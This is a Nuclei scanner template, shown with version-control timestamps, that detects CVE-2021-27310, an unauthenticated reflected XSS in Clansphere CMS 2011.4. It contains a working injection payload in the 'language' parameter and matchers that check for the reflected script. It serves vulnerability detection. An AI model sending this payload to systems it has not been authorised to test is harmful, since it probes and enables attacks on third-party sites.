nuclei-templates/cves/2021/CVE-2021-27310.yaml

38 lines
1.1 KiB
YAML
Raw Normal View History

2021-11-24 15:37:37 +00:00
id: CVE-2021-27310
info:
name: Clansphere CMS 2011.4 - Reflected Cross-Site Scripting (XSS)
author: alph4byt3
severity: medium
2021-12-04 07:14:08 +00:00
description: Clansphere CMS 2011.4 allows unauthenticated reflected XSS via "language" parameter.
reference:
- https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22language%22%20xss.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27310
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-27310
cwe-id: CWE-79
tags: xss,cve,cve2021,clansphere
2021-11-24 15:37:37 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module'
2021-11-24 15:37:37 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
2021-11-24 15:37:37 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200